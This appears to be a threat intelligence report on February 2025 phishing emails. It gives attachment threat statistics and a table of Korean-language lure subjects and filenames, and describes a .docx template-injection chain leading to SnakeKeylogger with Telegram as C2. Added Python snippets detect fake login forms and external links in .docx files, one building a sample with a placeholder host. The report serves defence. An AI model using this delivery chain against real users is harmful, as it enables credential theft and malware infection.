Trends Report on Phishing Emails in February 2025
1. Statistics on Attachment Threats in February 2025
In February 2025, the most prevalent threat type among phishing email attachments was Phishing (78%). This is the type where threat actors use HTML and other scripts to mimic login pages, advertising page layouts, logos, and fonts to create deceptive pages that can lure users into entering their account credentials. Subsequently, the threat actors transmit this information to their C2 server or lead users to fake sites. This type of phishing attack not only uses scripts but also includes hyperlinks in documents like PDFs to trick users into visiting phishing sites created by threat actors.
The second most common threat type is Trojan (12%). This malware tricks users into executing it by using double extensions or filenames with legitimate names.
The third most common threat type is malware that downloads additional malware from a C2 server (Downloader, 6%), followed by malware that steals user information (Infostealer, 4%), with FormBook being a prominent example. Security vulnerability exploits (Exploit, <1%) were also detected.
Compared to last month, the share of phishing malware rose significantly, from 44% to 78%. The number of samples increased along with the percentage, showing that overall phishing threats were relatively higher. The same trend is visible in the statistics under [Trend in Phishing (FakePage) Distribution Volume].
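A static check for the fake login page attachments described above, as an added example that is not part of the original report: it parses an HTML attachment and reports any remote host that would receive a password typed into it. The sample markup and the `example.invalid` host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples: a fake login page and a harmless local search form.
SAMPLE_FAKE_LOGIN = """<html><body><form method="post"
 action="https://collector.example.invalid/submit">
 <input type="text" name="email"><input type="password" name="pw"/>
</form></body></html>"""
SAMPLE_BENIGN = '<html><body><form action="search.html"><input name="q"></form></body></html>'


class FormAudit(HTMLParser):
    """Record each <form>'s action and whether it holds a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []    # one dict per form: {"action": str, "password": bool}
        self._open = None  # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def credential_post_targets(html_text):
    """Hosts that receive a password submitted from this attachment."""
    audit = FormAudit()
    audit.feed(html_text)
    hosts = []
    for form in audit.forms:
        url = urlparse(form["action"])
        # An attachment opened from disk has no origin of its own, so an
        # absolute http(s) action on a password form always leaves the machine.
        if form["password"] and url.scheme in ("http", "https") and url.hostname:
            hosts.append(url.hostname)
    return hosts
```

Pages that assemble the form or send the data from script will not be caught by this markup-only check, so treat an empty result as inconclusive rather than clean.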

Figure 1. Statistics on attachment threats
The statistics reflect the recent trends of threats posed by phishing emails by providing data on the distribution changes of samples in each category over the past six months. In addition, statistics on the extensions of attachments found in phishing emails allow users to identify the file formats used in such emails. Users can access these statistics and more in the original ATIP report.
2. List of Phishing Emails Distributed in Korean
| Email Subject | Attachment |
| --- | --- |
| FedEx Import Tax Invoice – 9914538167182 | Invoice-9433.html |
| Customs Invoice Tax | Forwarder SHIPMENT_AWB.html |
| Electronic Tax Invoice (*&*) -> Accounting Firm (****) Open in a New Window | NTS_eTaxInvoice.html |
| *** (***->Co., Ltd. *** Engineering ********) | NTS_eTaxInvoice.html |
| Bank Remittance Receipt | jj_Remittance_receipt.html |
| New Electronic Tax Invoice (********Co. ,Ltd.) ->) Open in a New Window | NTS_eTaxInvoice.html |
| Pending Custom AWB Invoice | AWB_custom invoice.html |
| Email Allocation: (98% total) | ******@******.co.kr_update.shtml |
| Your package has arrived at our office. | sunilgupta shipping receipt793048897.html |
| Customs Payment Notification | {Inv_Doc}.html |
| Quotation Request_***Tech_20250219 | PO-G0170-PF3F-25-0329.cab |
| Quotation Request//H**-059690-PO-05870-********-Order | H**-059690-PO-05870-*********-Order.zip |
| Re: ✈FedEx Cargo arrival notice | fdxdoc_inv.shtml |
| FedEx shipment AWB release date has been set for 2/14/2025 3:03:28 a.m. | SHIPMENT DOCUMENT.html |
| FedEx Custom AWB Invoice and Document | Custom AWB invoice.htm |
| Attach new invoice to FedEx Billing Online | Fedex invoice.html |
| DHL Shipment Invoice and AWB | DHL Custom AWB invoice.htm |
| AWB Shipping Document – Customs Fee | Fedex shipment AWB omh.html |
| ✈Information on DHL EXPRESS Additional Services Related to Export and Import | Inv_Doc.shtml |
| [Korea****] Buyer Inquiry Notice – 9567030369121 | Inquire-2362.html |
| The tax invoice issued to [******.] has arrived. | NTS_eTaxInvoice.html |
| [DHL KOREA] Invoice Notice: D01937677 | D01405477.html |
| FW: Request to Check Suspicious Email | PO-0058934.shtml |
| DHL 3037193913 (CS INSTRUMENT **** & CO) – Cargo Arrival Notice (Expected) | 3037193913_AWB_20250106_440_20250106.html |
Figure 2. Some of the phishing emails distributed in Korean
3. Case Study on Phishing Email Distribution
We analyzed representative cases by attachment format (Script, Document, Compress) to identify the phishing email attacks that took place this month. This month, phishing emails distributed downloader-type malware that uses a fake page and infostealer-type malware that uses a document attachment. An “External Link” is inserted into the “\word\_rels\settings.rels” file within the document, so the malicious behavior is triggered when users open the document. There has also been a recent increase in cases where executables (.exe) developed in .NET are compressed and distributed in phishing emails. Readers can find additional information such as the C2 address, analysis details, and the body of the phishing email that distributed the malware in the original ATIP report.

Figure 3. Attached document (.docx)
This document contains an “external link” in the “\word\_rels\settings.rels” file, and when the document is opened, it downloads and executes additional malware from the C2. The additionally downloaded malware, when executed as an HTA file, in turn downloads further malware via PowerShell.
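One way to triage a .docx attachment for this behavior, as an added example that is not from the original report: list every relationship marked `TargetMode="External"` and single out the ones in `settings.rels`. It goes slightly beyond the case above by scanning all `.rels` parts; the `attachedTemplate` type and `example.invalid` targets in the constructed fixture are assumptions, since the report does not state them.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MAX_PART = 1 << 20  # refuse oversized .rels parts instead of inflating them


def external_relationships(docx_bytes):
    """Return (part, rel_type, target) for each TargetMode="External" entry."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".rels"):
                continue
            if info.file_size > MAX_PART:
                findings.append((info.filename, "oversized-part", ""))
                continue
            data = zf.read(info)
            if b"<!DOCTYPE" in data:  # a DTD has no place in an OOXML part
                findings.append((info.filename, "doctype-present", ""))
                continue
            for rel in ET.fromstring(data).iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((info.filename, kind, rel.get("Target", "")))
    return findings


def needs_review(finding):
    """External hyperlinks are routine; anything else, or settings.rels, is not."""
    part, kind, _ = finding
    return part.lower().endswith("settings.rels") or kind != "hyperlink"


def build_sample():
    """Constructed fixture: only the two .rels parts, not an openable document."""
    def rels(kind, target):
        return ('<Relationships xmlns="' + REL_NS[1:-1] + '"><Relationship Id="rId1" '
                'Type="' + OFFICE_REL + kind + '" Target="' + target + '" '
                'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels",
                    rels("hyperlink", "https://example.invalid/page"))
        zf.writestr("word/_rels/settings.rels",
                    rels("attachedTemplate", "https://example.invalid/placeholder"))
    return buf.getvalue()
```

Running `external_relationships` at the mail gateway or in a sandbox pre-filter gives the target URL without opening the document in Word.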

Figure 4. Malware distributed as an attachment in Compress format
The malware that is ultimately executed is a type of SnakeKeylogger malware, which collects various information present on the system (PC) and sends it to the C2. The threat actor is using a Telegram channel as the C2.
※ Please refer to the attachment for more details.